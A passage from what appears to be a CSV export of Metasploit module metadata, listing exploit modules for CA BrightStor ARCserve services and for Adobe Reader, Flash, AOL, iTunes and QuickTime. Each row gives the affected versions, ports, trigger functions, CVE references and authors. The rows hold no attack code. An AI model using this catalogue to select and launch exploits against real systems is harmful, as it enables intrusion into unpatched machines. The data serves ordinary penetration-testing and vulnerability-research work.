In order to successfully exploit this vulnerability, you will need to set the hostname argument (HNAME).","Metasploit Framework License (BSD)","t","2008-10-09 00:00:00",0,,"aggressive","t","BID-31684, CVE-2008-4397, OSVDB-49468, URL-http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html","MC , Nahuel Cayento Riva" 333,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/discovery_tcp.rb","exploit","windows/brightstor/discovery_tcp","exploit/windows/brightstor/discovery_tcp","CA BrightStor Discovery Service TCP Overflow",200,"This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic[at]gmx.net and affects all known versions of the BrightStor product. This module is based on the 'cabrightstor_disco' exploit by HD Moore.","Metasploit Framework License (BSD)","t","2005-02-14 00:00:00",1,,"aggressive","t","BID-12536, CVE-2005-2535, EDB-1131, OSVDB-13814, URL-http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html","hdm , patrick " 334,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/discovery_udp.rb","exploit","windows/brightstor/discovery_udp","exploit/windows/brightstor/discovery_udp","CA BrightStor Discovery Service Stack Buffer Overflow",200,"This module exploits a vulnerability in the CA BrightStor Discovery Service. 
This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack buffer overflow.","Metasploit Framework License (BSD)","t","2004-12-20 00:00:00",0,,"aggressive","t","BID-12491, CVE-2005-0260, OSVDB-13613, URL-http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities","hdm , patrick " 335,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/etrust_itm_alert.rb","exploit","windows/brightstor/etrust_itm_alert","exploit/windows/brightstor/etrust_itm_alert","Computer Associates Alert Notification Buffer Overflow",200,"This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.","Metasploit Framework License (BSD)","t","2008-04-04 00:00:00",0,,"aggressive","t","BID-28605, CVE-2007-4620, OSVDB-44040","MC " 336,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/hsmserver.rb","exploit","windows/brightstor/hsmserver","exploit/windows/brightstor/hsmserver","CA BrightStor HSM Buffer Overflow",500,"This module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM. 
By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-09-27 00:00:00",0,,"aggressive","t","BID-25823, CVE-2007-5082, OSVDB-41363","toto" 337,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver.rb","exploit","windows/brightstor/lgserver","exploit/windows/brightstor/lgserver","CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-01-31 00:00:00",0,,"aggressive","t","BID-22342, CVE-2007-0449, OSVDB-31593","MC " 338,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_multi.rb","exploit","windows/brightstor/lgserver_multi","exploit/windows/brightstor/lgserver_multi","CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-3216, OSVDB-35329","MC " 339,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb","exploit","windows/brightstor/lgserver_rxrlogin","exploit/windows/brightstor/lgserver_rxrlogin","CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. 
By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-5003, OSVDB-41353","MC " 340,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb","exploit","windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter","exploit/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter","CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-3216, OSVDB-35329","MC " 341,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb","exploit","windows/brightstor/lgserver_rxsuselicenseini","exploit/windows/brightstor/lgserver_rxsuselicenseini","CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. 
By sending a specially crafted request (rxsUseLicenseIni), an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-3216, OSVDB-35329","MC " 342,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/license_gcr.rb","exploit","windows/brightstor/license_gcr","exploit/windows/brightstor/license_gcr","CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0. By sending a specially crafted request to the lic98rmtd.exe service, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2005-03-02 00:00:00",0,,"aggressive","t","BID-12705, CVE-2005-0581, OSVDB-14389","MC " 343,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb","exploit","windows/brightstor/mediasrv_sunrpc","exploit/windows/brightstor/mediasrv_sunrpc","CA BrightStor ArcServe Media Service Stack Buffer Overflow",200,"This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA BrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker can overflow a stack buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-04-25 00:00:00",0,,"aggressive","t","BID-23635, CVE-2007-2139, OSVDB-35326, URL-https://www.zerodayinitiative.com/advisories/ZDI-07-022.html","toto" 344,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/message_engine.rb","exploit","windows/brightstor/message_engine","exploit/windows/brightstor/message_engine","CA BrightStor ARCserve Message Engine Buffer Overflow",200,"This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. 
By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-01-11 00:00:00",1,,"aggressive","t","BID-22005, CVE-2007-0169, OSVDB-31318","MC , patrick " 345,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/message_engine_72.rb","exploit","windows/brightstor/message_engine_72","exploit/windows/brightstor/message_engine_72","CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow",200,"This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-04 00:00:00",0,,"aggressive","t","OSVDB-68329, URL-http://www.metasploit.com/users/mc","MC " 346,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/message_engine_heap.rb","exploit","windows/brightstor/message_engine_heap","exploit/windows/brightstor/message_engine_heap","CA BrightStor ARCserve Message Engine Heap Overflow",200,"This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup 11.5. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-10-05 00:00:00",0,,"aggressive","t","BID-20365, CVE-2006-5143, OSVDB-29533","MC " 347,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/sql_agent.rb","exploit","windows/brightstor/sql_agent","exploit/windows/brightstor/sql_agent","CA BrightStor Agent for Microsoft SQL Overflow",200,"This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. 
This vulnerability was discovered by cybertronic[at]gmx.net.","Metasploit Framework License (BSD)","t","2005-08-02 00:00:00",0,,"aggressive","t","BID-14453, CVE-2005-1272, OSVDB-18501, URL-http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities, URL-http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239","hdm " 348,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/tape_engine.rb","exploit","windows/brightstor/tape_engine","exploit/windows/brightstor/tape_engine","CA BrightStor ARCserve Tape Engine Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-11-21 00:00:00",1,,"aggressive","t","BID-21221, CVE-2006-6076, EDB-3086, OSVDB-30637, URL-http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317","MC , patrick " 349,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/tape_engine_8A.rb","exploit","windows/brightstor/tape_engine_8A","exploit/windows/brightstor/tape_engine_8A","CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup r11.1 - r11.5. 
By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-04 00:00:00",0,,"aggressive","t","OSVDB-68330, URL-http://www.metasploit.com/users/mc","MC " 350,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/universal_agent.rb","exploit","windows/brightstor/universal_agent","exploit/windows/brightstor/universal_agent","CA BrightStor Universal Agent Overflow",200,"This module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address.","Metasploit Framework License (BSD)","t","2005-04-11 00:00:00",0,,"aggressive","t","BID-13102, CVE-2005-1018, OSVDB-15471, URL-http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities","hdm " 351,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_cooltype_sing.rb","exploit","windows/browser/adobe_cooltype_sing","exploit/windows/browser/adobe_cooltype_sing","Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",500,"This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. 
Prior versions are assumed to be vulnerable as well.","Metasploit Framework License (BSD)","f","2010-09-07 00:00:00",0,,"passive","t","CVE-2010-2883, OSVDB-67849, URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html, URL-http://www.adobe.com/support/security/advisories/apsa10-02.html","Unknown, jduck , sn0wfl0w" 352,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb","exploit","windows/browser/adobe_flash_mp4_cprt","exploit/windows/browser/adobe_flash_mp4_cprt","Adobe Flash Player MP4 'cprt' Overflow",300,"This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the ""Iran's Oil and Nuclear Situation.doc"" e-mail attack. According to the advisory, 10.3.183.15 and 11.x before 11.1.102.62 are affected.","Metasploit Framework License (BSD)","f","2012-02-15 00:00:00",0,,"passive","t","BID-52034, CVE-2012-0754, OSVDB-79300, URL-http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html, URL-http://www.adobe.com/support/security/bulletins/apsb12-03.html","Alexander Gavrun, juan vazquez , sinn3r " 353,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_otf_font.rb","exploit","windows/browser/adobe_flash_otf_font","exploit/windows/browser/adobe_flash_otf_font","Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",300,"This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file with a large nTables value in the 'kern' header, it is possible to trigger an integer overflow, which results in remote code execution under the context of the user. 
This vulnerability has also been exploited in the wild in limited targeted attacks. Please note in order to ensure reliability, the exploit is forced to modify your URIPATH parameter to less than 3 characters, which may cause possible URIPATH collisions.","Metasploit Framework License (BSD)","f","2012-08-09 00:00:00",0,,"passive","t","BID-55009, CVE-2012-1535, OSVDB-84607, URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html, URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/, URL-http://vrt-blog.snort.org/2012/08/cve-2012-1535-flash-0-day-in-wild.html, URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html, URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit, URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html","Alexander Gavrun, juan vazquez , sinn3r " 354,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_rtmp.rb","exploit","windows/browser/adobe_flash_rtmp","exploit/windows/browser/adobe_flash_rtmp","Adobe Flash Player Object Type Confusion",300,"This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 ""_error"" response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the ""World Uyghur Congress Invitation.doc"" e-mail attack. 
According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.","Metasploit Framework License (BSD)","f","2012-05-04 00:00:00",0,,"passive","t","BID-53395, CVE-2012-0779, OSVDB-81656, URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html, URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability","juan vazquez , sinn3r " 355,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_sps.rb","exploit","windows/browser/adobe_flash_sps","exploit/windows/browser/adobe_flash_sps","Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",300,"This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. 
Numerous reports also indicate that this vulnerability has been exploited in the wild.","Metasploit Framework License (BSD)","f","2011-08-09 00:00:00",0,,"passive","t","BID-49083, CVE-2011-2140, OSVDB-74439, URL-http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html, URL-http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/, URL-http://www.adobe.com/support/security/bulletins/apsb11-21.html, URL-http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-276/","Abysssec, Alexander Gavrun, sinn3r " 356,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb","exploit","windows/browser/adobe_flashplayer_arrayindexing","exploit/windows/browser/adobe_flashplayer_arrayindexing","Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",500,"This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT (Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean-based organizations. Specifically, when an array is indexed using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. 
This exploit bypasses ASLR/DEP and is very reliable.","Metasploit Framework License (BSD)","f","2012-06-21 00:00:00",0,,"passive","t","BID-48268, CVE-2011-2110, OSVDB-73007, URL-http://www.accessroot.com/arteam/site/download.php?view.331, URL-http://www.adobe.com/devnet/swf.html, URL-http://www.adobe.com/support/security/bulletins/apsb11-18.html, URL-http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617","Unknown, mr_me " 357,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_avm.rb","exploit","windows/browser/adobe_flashplayer_avm","exploit/windows/browser/adobe_flashplayer_avm","Adobe Flash Player AVM Bytecode Verification Vulnerability",400,"This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT (Just-In-Time) code being executed. This is the same vulnerability that was used for the RSA attack in March 2011. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. 
Due to the nature of the uninitialized memory it's fairly difficult to get around this restriction.","Metasploit Framework License (BSD)","f","2011-03-15 00:00:00",0,,"passive","t","CVE-2011-0609, OSVDB-71254, URL-http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html, URL-http://www.adobe.com/devnet/swf.html, URL-http://www.adobe.com/support/security/advisories/apsa11-01.html, URL-http://www.f-secure.com/weblog/archives/00002226.html","Unknown, bannedit " 358,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb","exploit","windows/browser/adobe_flashplayer_flash10o","exploit/windows/browser/adobe_flashplayer_flash10o","Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",300,"This module exploits a vulnerability in Adobe Flash Player that was discovered and has been actively exploited in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results in arbitrary code execution. 
Please note for IE 8 targets, Java Runtime Environment must be available on the victim machine in order to work properly.","Metasploit Framework License (BSD)","f","2011-04-11 00:00:00",0,,"passive","t","BID-47314, CVE-2011-0611, OSVDB-71686, URL-http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx, URL-http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html, URL-http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html, URL-http://secunia.com/blog/210, URL-http://www.adobe.com/support/security/bulletins/apsb11-07.html","sinn3r " 359,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb","exploit","windows/browser/adobe_flashplayer_newfunction","exploit/windows/browser/adobe_flashplayer_newfunction","Adobe Flash Player ""newfunction"" Invalid Pointer Use",300,"This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. 
This method is unlikely to work across various Windows versions due to the hardcoded syscall number.","Metasploit Framework License (BSD)","f","2010-06-04 00:00:00",0,,"passive","t","BID-40586, CVE-2010-1297, OSVDB-65141, URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/, URL-http://www.adobe.com/support/security/advisories/apsa10-01.html","Unknown, jduck " 360,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb","exploit","windows/browser/adobe_flatedecode_predictor02","exploit/windows/browser/adobe_flatedecode_predictor02","Adobe FlateDecode Stream Predictor 02 Integer Overflow",400,"This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.","Metasploit Framework License (BSD)","f","2009-10-08 00:00:00",0,,"passive","t","BID-36600, CVE-2009-3459, OSVDB-58729, URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html, URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html, URL-http://www.fortiguard.com/analysis/pdfanalysis.html","jabra, jduck , unknown" 361,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_geticon.rb","exploit","windows/browser/adobe_geticon","exploit/windows/browser/adobe_geticon","Adobe Collab.getIcon() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. 
By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"passive","t","CVE-2009-0927, OSVDB-53647, URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-014/","Didier Stevens , MC , jduck " 362,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_jbig2decode.rb","exploit","windows/browser/adobe_jbig2decode","exploit/windows/browser/adobe_jbig2decode","Adobe JBIG2Decode Heap Corruption",400,"This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.","Metasploit Framework License (BSD)","f","2009-02-19 00:00:00",0,,"passive","t","CVE-2009-0658, OSVDB-52073, URL-http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html, URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html","Didier Stevens , MC , natron , redsand, xort" 363,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_media_newplayer.rb","exploit","windows/browser/adobe_media_newplayer","exploit/windows/browser/adobe_media_newplayer","Adobe Doc.media.newPlayer Use After Free Vulnerability",400,"This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.","Metasploit Framework License (BSD)","f","2009-12-14 00:00:00",0,,"passive","t","BID-37331, CVE-2009-4324, OSVDB-60980, URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html","hdm , jabra, jduck , pusscat , unknown" 364,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb","exploit","windows/browser/adobe_shockwave_rcsl_corruption","exploit/windows/browser/adobe_shockwave_rcsl_corruption","Adobe Shockwave rcsL Memory Corruption",300,"This module exploits a weakness in the Adobe Shockwave player's handling of Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented rcsL chunk. This vulnerability was discovered by http://www.abysssec.com.","Metasploit Framework License (BSD)","f","2010-10-21 00:00:00",0,,"passive","t","CVE-2010-3653, OSVDB-68803, URL-http://www.adobe.com/support/security/bulletins/apsb10-25.html, URL-http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip","David Kennedy ""ReL1K"" " 365,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_utilprintf.rb","exploit","windows/browser/adobe_utilprintf","exploit/windows/browser/adobe_utilprintf","Adobe util.printf() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-08 00:00:00",0,,"passive","t","CVE-2008-2992, OSVDB-49520","Didier Stevens , MC " 366,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aim_goaway.rb","exploit","windows/browser/aim_goaway","exploit/windows/browser/aim_goaway","AOL Instant Messenger goaway Overflow",500,"This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying an overly sized buffer as the 'message' parameter. 
This issue is known to affect AOL Instant Messenger 5.5.","Metasploit Framework License (BSD)","f","2004-08-09 00:00:00",0,,"passive","t","BID-10889, CVE-2004-0636, OSVDB-8398, URL-http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities","skape , thief " 367,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb","exploit","windows/browser/aladdin_choosefilepath_bof","exploit/windows/browser/aladdin_choosefilepath_bof","Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",300,"This module exploits a vulnerability found in Aladdin Knowledge System's ActiveX component. By supplying a long string of data to the ChooseFilePath() function, a buffer overflow occurs, which may result in remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-01 00:00:00",0,,"passive","t","EDB-22258, EDB-22301, OSVDB-86723","b33f, juan vazquez , shinnai, sinn3r " 368,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/amaya_bdo.rb","exploit","windows/browser/amaya_bdo","exploit/windows/browser/amaya_bdo","Amaya Browser v11.0 'bdo' Tag Overflow",300,"This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the ""bdo"" tag, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-01-28 00:00:00",0,,"passive","t","BID-33046, BID-33047, CVE-2009-0323, OSVDB-55721","dookie, original exploit by Rob Carter" 369,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aol_ampx_convertfile.rb","exploit","windows/browser/aol_ampx_convertfile","exploit/windows/browser/aol_ampx_convertfile","AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow",300,"This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website. 
By setting an overly long value to 'ConvertFile()', an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-05-19 00:00:00",0,,"passive","t","BID-35028, EDB-8733, OSVDB-54706","Trancer , rgod " 370,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aol_icq_downloadagent.rb","exploit","windows/browser/aol_icq_downloadagent","exploit/windows/browser/aol_icq_downloadagent","America Online ICQ ActiveX Control Arbitrary File Download and Execute",600,"This module allows remote attackers to download and execute arbitrary files on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.","Metasploit Framework License (BSD)","f","2006-11-06 00:00:00",0,,"passive","t","BID-20930, CVE-2006-5650, OSVDB-30220, URL-http://www.zerodayinitiative.com/advisories/ZDI-06-037/","MC " 371,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_itunes_playlist.rb","exploit","windows/browser/apple_itunes_playlist","exploit/windows/browser/apple_itunes_playlist","Apple ITunes 4.7 Playlist Buffer Overflow",300,"This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.","Metasploit Framework License (BSD)","f","2005-01-11 00:00:00",0,,"passive","t","BID-12238, CVE-2005-0043, OSVDB-12833","MC " 372,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb","exploit","windows/browser/apple_quicktime_marshaled_punk","exploit/windows/browser/apple_quicktime_marshaled_punk","Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",500,"This module exploits a memory trust issue in Apple QuickTime 7.6.7. 
